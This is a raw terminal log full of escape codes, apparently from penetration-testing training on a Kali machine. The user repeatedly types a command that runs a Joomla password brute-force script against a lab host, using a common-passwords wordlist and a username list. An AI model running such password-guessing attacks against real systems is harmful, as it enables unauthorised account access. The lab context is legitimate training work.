#[J#[0m500-worst-passwords.txt #[J#[01;31m500-worst-
passwords.txt.bz2#[0m#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr
#[33m<#[39musername#[33m>#[39m#[K#[15C[7:59:41]#[0m#[40D#[16C
#[J#[0;1;2mfile#[0m
#[J#[01;32mjoomla-brute.py#[0m* #[JREADME.md #[Jtest.py
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr
#[33m<#[39musername#[33m>#[39m#[K#[15C[7:59:41]#[0m#[24D#[9D #[39m #[9D
#[J#[0;1;2mfile#[0m
#[J#[01;32mjoomla-brute.py#[0m* #[JREADME.md #[Jtest.py
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr #[33m<#[39m#[K#[24C[7:59:41]#[0m#[33D##[39m #
#[J#[0;1;2mfile#[0m
#[J#[01;32mjoomla-brute.py#[0m* #[JREADME.md #[Jtest.py
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr#[K#[26C[7:59:41]#[0m#[34D/##[4m/#[24m
#[J#[0;1;2mdirectory#[0m
#[01;36mbin#[0m@ #[01;34mboot#[0m/ #[01;34mdev#[0m/
#[01;34metc#[0m/ #[01;34mhome#[0m/ #[01;36mlib#[0m@
#[01;36mlib32#[0m@ #[01;36mlib64#[0m@ #[01;34mlost+found#[0m/
#[01;34mmedia#[0m/ #[01;34mmnt#[0m/
#[01;34mopt#[0m/ #[01;34mproc#[0m/ #[01;34mroot#[0m/
#[01;34mrun#[0m/ #[01;36msbin#[0m@ #[01;34msrv#[0m/
#[01;34msys#[0m/ #[30;42mtmp#[0m/ #[01;34musr#[0m/
#[01;34mvar#[0m/
#[0;1;2mfile#[0m
#[J#[01;36minitrd.img#[0m@ #[J#[01;36minitrd.img.old#[0m@
#[J#[01;36mvmlinuz#[0m@ #[J#[01;36mvmlinuz.old#[0m@
#[J#[5A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr
#[4m/#[24m#[K#[24C[7:59:41]#[0m#[33D##[4m/#[4mu#[24m##[4mu#[4ms#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34musr#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr
#[4m/us#[24m#[K#[22C[7:59:41]#[0m#[31D##[4ms#[4mr#[24m##[4mr#[4m/#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mbin#[0m/ #[J#[01;34mgames#[0m/ #[J#[01;34mi686-w64-mingw32#[0m/
#[J#[01;34minclude#[0m/ #[J#[01;34mlib#[0m/ #[J#[01;34mlib32#[0m/
#[J#[01;34mlib64#[0m/ #[J#[01;34mlibexec#[0m/ #[J#[01;34mlocal#[0m/
#[J#[01;34msbin#[0m/ #[J#[01;34mshare#[0m/ #[J#[01;34msrc#[0m/
#[J#[01;34mx86_64-w64-mingw32#[0m/ #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr
#[4m/usr/#[24m#[K#[20C[7:59:41]#[0m#[29D##[4m/#[4ms#[24m##[4ms#[4mh#[24m##[4mh#[4ma
#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mshare#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr
#[4m/usr/sha#[24m#[K#[17C[7:59:41]#[0m#[26D##[4ma#[4mr#[24m##[4mr#[4me#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mshare#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr #[4m/usr/share#[24m#[K#[15C[7:59:41]#[0m#[24D
#[J#[A#[130C##[4me#[1m#[4m/
#[0m#[24m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[J#[0;1;2mdirectory#[0m
#[01;34maccounts#[0m/ #[01;34maccountsservice#[0m/
#[01;34maclocal#[0m/ #[01;34malsa#[0m/ #[01;34malsa-card-
profile#[0m/ #[01;34mamass#[0m/ #[01;34mant#[0m/
#[01;34mapache2#[0m/
#[01;34mapparmor-features#[0m/ #[01;34mapplication-registry#[0m/
#[01;34mapplications#[0m/ #[01;34mapport#[0m/ #[01;34mapps#[0m/
#[01;34mappstream#[0m/ #[01;34mapt-file#[0m/ #[01;34marp-scan#[0m/
#[01;34maspell#[0m/ #[01;34matril#[0m/
#[01;34mautopsy#[0m/ #[01;34mavahi#[0m/ #[01;34mawk#[0m/
#[01;34mbackgrounds#[0m/ #[01;34mbase-files#[0m/ #[01;34mbase-passwd#[0m/
#[01;34mbash-completion#[0m/ #[01;34mbinfmts#[0m/
#[01;34mbluedevilwizard#[0m/ #[01;34mblueman#[0m/ #[01;34mbug#[0m/
#[01;34mbuild-essential#[0m/ #[01;34mburpsuite#[0m/ #[01;34mca-
certificates#[0m/
#[01;34mca-certificates-java#[0m/ #[01;34mcaja#[0m/
#[01;34mcatdoc#[0m/ #[01;34mcatfish#[0m/ #[01;34mcffi-
wheels#[0m/ #[01;34mcherrytree#[0m/ #[01;34mchromium#[0m/
#[01;34mcmake#[0m/
#[01;34mcolor#[0m/ #[01;34mcolord#[0m/
#[01;34mcolor-schemes#[0m/ #[01;34mcommand-not-found#[0m/ #[01;34mcommix#[0m/
#[01;34mcommon-licenses#[0m/ #[01;34mconfig.kcfg#[0m/ #[01;34mconsolefonts#[0m/
#[01;34mconsole-setup#[0m/ #[01;34mconsoletrans#[0m/
#[01;34mcontractor#[0m/ #[01;34mcreddump7#[0m/ #[01;34mcrunch#[0m/
#[01;34mcryptsetup#[0m/ #[01;34mcups#[0m/ #[01;34mdavtest#[0m/
#[J#[30m#[104m(MORE)#[39m#[49m#[9A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr
#[4m/usr/share#[1m#[4m/#[0m#[24m#[K#[14C[7:59:41]#[0m#[23D##[1m#[4m/
#[1m#[4ms#[0m#[24m###[0m#[4m/#[0m#[4ms#[24m##[4ms#[4me#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mseclists#[0m/ #[J#[01;34msensible-utils#[0m/ #[J#[01;34mset#[0m/
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr
#[4m/usr/share/se#[24m#[K#[12C[7:59:41]#[0m#[21D####[4m/#[24m#[24m #[24m
###[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[J#[0;1;2mdirectory#[0m
#[01;34maccounts#[0m/ #[01;34maccountsservice#[0m/
#[01;34maclocal#[0m/ #[01;34malsa#[0m/ #[01;34malsa-card-
profile#[0m/ #[01;34mamass#[0m/ #[01;34mant#[0m/
#[01;34mapache2#[0m/
#[01;34mapparmor-features#[0m/ #[01;34mapplication-registry#[0m/
#[01;34mapplications#[0m/ #[01;34mapport#[0m/ #[01;34mapps#[0m/
#[01;34mappstream#[0m/ #[01;34mapt-file#[0m/ #[01;34marp-scan#[0m/
#[01;34maspell#[0m/ #[01;34matril#[0m/
#[01;34mautopsy#[0m/ #[01;34mavahi#[0m/ #[01;34mawk#[0m/
#[01;34mbackgrounds#[0m/ #[01;34mbase-files#[0m/ #[01;34mbase-passwd#[0m/
#[01;34mbash-completion#[0m/ #[01;34mbinfmts#[0m/
#[01;34mbluedevilwizard#[0m/ #[01;34mblueman#[0m/ #[01;34mbug#[0m/
#[01;34mbuild-essential#[0m/ #[01;34mburpsuite#[0m/ #[01;34mca-
certificates#[0m/
#[01;34mca-certificates-java#[0m/ #[01;34mcaja#[0m/
#[01;34mcatdoc#[0m/ #[01;34mcatfish#[0m/ #[01;34mcffi-
wheels#[0m/ #[01;34mcherrytree#[0m/ #[01;34mchromium#[0m/
#[01;34mcmake#[0m/
#[01;34mcolor#[0m/ #[01;34mcolord#[0m/
#[01;34mcolor-schemes#[0m/ #[01;34mcommand-not-found#[0m/ #[01;34mcommix#[0m/
#[01;34mcommon-licenses#[0m/ #[01;34mconfig.kcfg#[0m/ #[01;34mconsolefonts#[0m/
#[01;34mconsole-setup#[0m/ #[01;34mconsoletrans#[0m/
#[01;34mcontractor#[0m/ #[01;34mcreddump7#[0m/ #[01;34mcrunch#[0m/
#[01;34mcryptsetup#[0m/ #[01;34mcups#[0m/ #[01;34mdavtest#[0m/
#[J#[30m#[104m(MORE)#[39m#[49m#[9A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr
#[4m/usr/share/#[24m#[K#[14C[7:59:41]#[0m#[23D########[4m/#[24m#[24m #[24m #[24m
#[24m #[24m #[24m ######
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mbin#[0m/ #[J#[01;34mgames#[0m/ #[J#[01;34mi686-w64-mingw32#[0m/
#[J#[01;34minclude#[0m/ #[J#[01;34mlib#[0m/ #[J#[01;34mlib32#[0m/
#[J#[01;34mlib64#[0m/ #[J#[01;34mlibexec#[0m/ #[J#[01;34mlocal#[0m/
#[J#[01;34msbin#[0m/ #[J#[01;34mshare#[0m/ #[J#[01;34msrc#[0m/
#[J#[01;34mx86_64-w64-mingw32#[0m/ #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr
#[4m/usr/#[24m#[K#[20C[7:59:41]#[0m#[29D######[4m/#[24m#[24m #[24m #[24m #[24m ####
#[J#[0;1;2mdirectory#[0m
#[01;36mbin#[0m@ #[01;34mboot#[0m/ #[01;34mdev#[0m/
#[01;34metc#[0m/ #[01;34mhome#[0m/ #[01;36mlib#[0m@
#[01;36mlib32#[0m@ #[01;36mlib64#[0m@ #[01;34mlost+found#[0m/
#[01;34mmedia#[0m/ #[01;34mmnt#[0m/
#[01;34mopt#[0m/ #[01;34mproc#[0m/ #[01;34mroot#[0m/
#[01;34mrun#[0m/ #[01;36msbin#[0m@ #[01;34msrv#[0m/
#[01;34msys#[0m/ #[30;42mtmp#[0m/ #[01;34musr#[0m/
#[01;34mvar#[0m/
#[0;1;2mfile#[0m
#[J#[01;36minitrd.img#[0m@ #[J#[01;36minitrd.img.old#[0m@
#[J#[01;36mvmlinuz#[0m@ #[J#[01;36mvmlinuz.old#[0m@
#[J#[5A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr #[4m/#[24m#[K#[24C[7:59:41]#[0m#[33D##[24m #
#[J#[0;1;2mfile#[0m
#[J#[01;32mjoomla-brute.py#[0m* #[JREADME.md #[Jtest.py
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr#[K#[26C[7:59:41]#[0m#[34D~##[4m~#[24m
#[J#[0;1;2mnamed directory#[0m
#[J#[0mautocomplete #[Jautocomplete-log #[Jzsh-
autocomplete#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr #[4m~#[24m#[K#[24C[7:59:41]#[0m#[33D##[4m~#[4m/#[24m
#[J#[0;1;2mdirectory#[0m
#[01;34m2024-05-02-ZAP-Report-#[0m/ #[01;34m2024-05-02-ZAP-Report-2#[0m/
#[01;34m2024-05-02-ZAP-Report-3#[0m/ #[01;34mCPTS#[0m/ #[01;34mCTF#[0m/
#[01;34mDesktop#[0m/ #[01;34mDownloads#[0m/ #[01;34mSQLiteStudio#[0m/
#[01;34mTools#[0m/ #[01;34m 模板#[0m/
#[0;1;2mfile#[0m
#[J#[0m2024-05-02-ZAP-Report-.html
#[Jscript.log
#[J#[4A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr #[4m~/#[24m#[K#[23C[7:59:41]#[0m#[32D##[4m/#[4mC#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mCPTS#[0m/ #[J#[01;34mCTF#[0m/ #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr #[4m~/C#[24m#[K#[22C[7:59:41]#[0m#[31D##[4mC#[4mP#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mCPTS#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr #[4m~/CP#[24m#[K#[21C[7:59:41]#[0m#[30D##[4mP#[4mT#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mCPTS#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr #[4m~/CPT#[24m#[K#[20C[7:59:41]#[0m#[29D##[4mT#[4mS#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mCPTS#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr #[4m~/CPTS#[24m#[K#[19C[7:59:41]#[0m#[28D##[4mS#[4m/#[24m
#[J#[0;1;2mdirectory#[0m
#[01;34mNIX01#[0m/
#[01;34mTerminalLogs#[0m/
#[0;1;2mfile#[0m
#[J#[0mBurpSuite_cert #[JHTB\ Certified\ Penetration\ Testing\ Specialist.ovpn
#[Jzap_root_ca.cer #[J#[4A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr #[4m~/CPTS/#[24m#[K#[18C[7:59:41]#[0m#[27D##[4m/#[4mN#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mNIX01#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr #[4m~/CPTS/N#[24m#[K#[17C[7:59:41]#[0m#[26D##[4mN#[4mI#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mNIX01#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr
#[4m~/CPTS/NI#[24m#[K#[16C[7:59:41]#[0m#[25D##[4mI#[4mX#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mNIX01#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr #[4m~/CPTS/NIX#[24m#[K#[15C[7:59:41]#[0m#[24D
#[J#[A#[130C##[4mX#[4m01#[1m#[4m/#[0m#[24m
#[J#[0;1;2mfile#[0m
#[J#[0mhydra.restore #[Jmain_wordlist.txt #[Jrequest.txt
#[JUninstaller.lnk #[Juser_list.txt #[JZoneTransfer.txt
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr
#[4m~/CPTS/NIX01#[1m#[4m/#[0m#[24m#[K#[12C[7:59:41]#[0m#[21D##[1m#[4m/
#[1m#[4mu#[0m#[24m###[0m#[4m/#[0m#[4mu#[24m##[4mu#[4ms#[24m
#[J#[0;1;2mfile#[0m
#[J#[0muser_list.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr
#[4m~/CPTS/NIX01/us#[24m#[K#[10C[7:59:41]#[0m#[19D##[4ms#[4me#[24m##[4me#[4mr#[24m
#[J#[0;1;2mfile#[0m
#[J#[0muser_list.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr #[4m~/CPTS/NIX01/user#[24m#[K#[8C[7:59:41]#[0m#[17D
#[J#[A#[137C##[4mr#[4m_list.txt#[24m#[K
#[J#[0;1;2mfile#[0m
#[J#[0muser_list.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr #[4m~/CPTS/NIX01/user_list.txt#[24m#[K#[0m#[?1l#>#[?2004l
#[J#[A#[146C
#]2;kali@kali:~/Tools/joomla-bruteforce##]1;..la-bruteforce##]7;file:///home/kali/
Tools/joomla-bruteforce#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/joomla-
bruteforce#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m927#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:00:28]#[148D#[?1h#=#[?
2004h
#[J#[A#[147C##[0m ####
#[J#[0;1;2mfile#[0m
#[J#[0muser_list.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr
#[4m~/CPTS/NIX01/user_list.txt#[24m#[K#[0m####################################[10D#
##########[10D#[9D#####################[9D#####
#[J#[A#[38Chblog.trilocor.local -w#[24m
#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/#[4ms#[4me#[4mc#[4ml#[4mi#[4
ms#[4mt#[4ms#[4m/#[4mP#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m/
#[4m5#[4m0#[4m0#[4m-#[4mw#[4mo#[4mr#[4ms#[4mt#[4m-
#[4mp#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m.#[4mt#[4mx#[4mt#[24m -usr#[24m
#[4m~#[4m/#[4mC#[4mP#[4mT#[4mS#[4m/#[4mN#[4mI#[4mX#[4m0#[4m1#[4m/#[4mu#[4ms#[4me#[4
mr#[4m_#[4ml#[4mi#[4ms#[4mt#[4m.#[4mt#[4mx#[4mt#[24m#[108Dtblog.trilocor.local -
w#[24m
#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/#[4ms#[4me#[4mc#[4ml#[4mi#[4
ms#[4mt#[4ms#[4m/#[4mP#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m/
#[4m5#[4m0#[4m0#[4m-#[4mw#[4mo#[4mr#[4ms#[4mt#[4m-
#[4mp#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m.#[4mt#[4mx#[4mt#[24m -usr#[24m
#[4m~#[4m/#[4mC#[4mP#[4mT#[4mS#[4m/#[4mN#[4mI#[4mX#[4m0#[4m1#[4m/#[4mu#[4ms#[4me#[4
mr#[4m_#[4ml#[4mi#[4ms#[4mt#[4m.#[4mt#[4mx#[4mt#[24m#[108Dtblog.trilocor.local -
w#[24m
#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/#[4ms#[4me#[4mc#[4ml#[4mi#[4
ms#[4mt#[4ms#[4m/#[4mP#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m/
#[4m5#[4m0#[4m0#[4m-#[4mw#[4mo#[4mr#[4ms#[4mt#[4m-
#[4mp#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m.#[4mt#[4mx#[4mt#[24m -usr#[24m
#[4m~#[4m/#[4mC#[4mP#[4mT#[4mS#[4m/#[4mN#[4mI#[4mX#[4m0#[4m1#[4m/#[4mu#[4ms#[4me#[4
mr#[4m_#[4ml#[4mi#[4ms#[4mt#[4m.#[4mt#[4mx#[4mt#[24m#[108Dpblog.trilocor.local -
w#[24m
#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/#[4ms#[4me#[4mc#[4ml#[4mi#[4
ms#[4mt#[4ms#[4m/#[4mP#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m/
#[4m5#[4m0#[4m0#[4m-#[4mw#[4mo#[4mr#[4ms#[4mt#[4m-
#[4mp#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m.#[4mt#[4mx#[4mt#[24m -usr#[24m
#[4m~#[4m/#[4mC#[4mP#[4mT#[4mS#[4m/#[4mN#[4mI#[4mX#[4m0#[4m1#[4m/#[4mu#[4ms#[4me#[4
mr#[4m_#[4ml#[4mi#[4ms#[4mt#[4m.#[4mt#[4mx#[4mt#[24m#[108D:blog.trilocor.local -
w#[24m
#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/#[4ms#[4me#[4mc#[4ml#[4mi#[4
ms#[4mt#[4ms#[4m/#[4mP#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m/
#[4m5#[4m0#[4m0#[4m-#[4mw#[4mo#[4mr#[4ms#[4mt#[4m-
#[4mp#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m.#[4mt#[4mx#[4mt#[24m -usr#[24m
#[4m~#[4m/#[4mC#[4mP#[4mT#[4mS#[4m/#[4mN#[4mI#[4mX#[4m0#[4m1#[4m/#[4mu#[4ms#[4me#[4
mr#[4m_#[4ml#[4mi#[4ms#[4mt#[4m.#[4mt#[4mx#[4mt#[24m#[108D/blog.trilocor.local -
w#[24m
#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/#[4ms#[4me#[4mc#[4ml#[4mi#[4
ms#[4mt#[4ms#[4m/#[4mP#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m/
#[4m5#[4m0#[4m0#[4m-#[4mw#[4mo#[4mr#[4ms#[4mt#[4m-
#[4mp#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m.#[4mt#[4mx#[4mt#[24m -usr#[24m
#[4m~#[4m/#[4mC#[4mP#[4mT#[4mS#[4m/#[4mN#[4mI#[4mX#[4m0#[4m1#[4m/#[4mu#[4ms#[4me#[4
mr#[4m_#[4ml#[4mi#[4ms#[4mt#[4m.#[4mt#[4mx#[4mt#[24m#[108D/blog.trilocor.local -
w#[24m
#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/#[4ms#[4me#[4mc#[4ml#[4mi#[4
ms#[4mt#[4ms#[4m/#[4mP#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m/
#[4m5#[4m0#[4m0#[4m-#[4mw#[4mo#[4mr#[4ms#[4mt#[4m-
#[4mp#[4ma#[4ms#[4ms#[4mw#[4mo#[4mr#[4md#[4ms#[4m.#[4mt#[4mx#[4mt#[24m -usr#[24m
#[4m~#[4m/#[4mC#[4mP#[4mT#[4mS#[4m/#[4mN#[4mI#[4mX#[4m0#[4m1#[4m/#[4mu#[4ms#[4me#[4
mr#[4m_#[4ml#[4mi#[4ms#[4mt#[4m.#[4mt#[4mx#[4mt#[24m#[108D#[?1l#>#[?2004l
#[J#[A#[45C
#]2;kali@kali:~/Tools/joomla-bruteforce##]1;..la-bruteforce##]7;file:///home/kali/
Tools/joomla-bruteforce#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/joomla-
bruteforce#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m928#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:00:41]#[148D#[?1h#=#[?
2004h
#[J#[A#[154C##[0m ##[?1l#>#[?2004l
#[J#[A#[153C
#]2;kali@kali:~/Tools/joomla-bruteforce##]1;..la-bruteforce##]7;file:///home/kali/
Tools/joomla-bruteforce#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/Tools/joomla-
bruteforce#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m928#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:01:13]#[148D#[?1h#=#[?
2004h
#[J#[0;1;2mfile#[0m
#[J#[0muser_list.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mpython3#[39m #[4mjoomla-brute.py#[24m -u
http://blog.trilocor.local -w #[4m/usr/share/seclists/Passwords/500-worst-
passwords.txt#[24m -usr
#[4m~/CPTS/NIX01/user_list.#[24m#[90mtxt#[39m#[K#[0m##########[4m_#[24m#[24m #[24m
#[24m #[24m #[24m #[39m #[39m #[39m
#[8D#[90mlist.txt#[39m#[8D#######[4m/#[24m#[K#[5C[8:01:13]#[14D#[90muser_list.txt#[
39m#[K#[13D########[4m/#[24m#[K#[11C[8:01:13]#[20D#[90mNIX01/
user_list.txt#[39m#[K#[19D#######[4m/#[24m#[K#[16C[8:01:13]#[25D#[90mCPTS/NIX01/
user_list.txt#[39m#[K#[24D#######[K#[22C[8:01:13]#[31D#[90musr
